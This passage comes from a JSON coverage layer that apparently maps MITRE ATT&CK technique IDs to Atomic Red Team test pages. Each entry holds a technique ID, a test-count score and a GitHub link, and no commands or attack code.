Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":34,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.001","score":3,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.002/T1098.002.md"}]},{"techniqueID":"T1098.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.003/T1098.003.md"}]},{"techniqueID":"T1098.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":29,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":68,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1115","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}]},{"techniqueID":"T1127.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1129","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1129/T1129.md"}]},{"techniqueID":"T1132","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":10,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1136.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1137","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1137.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.001/T1137.001.md"}]},{"techniqueID":"T1137.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1216.001","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":78,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1218.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222.002","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1485","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1496","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1529","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1531","score":8,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1543.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546","score":39,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}]},{"techniqueID":"T1546.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.004","score":7,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.014","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":45,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547.001","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":42,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.002","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1552.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553","score":13,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":30,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555.003","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"links":[{"label":"View 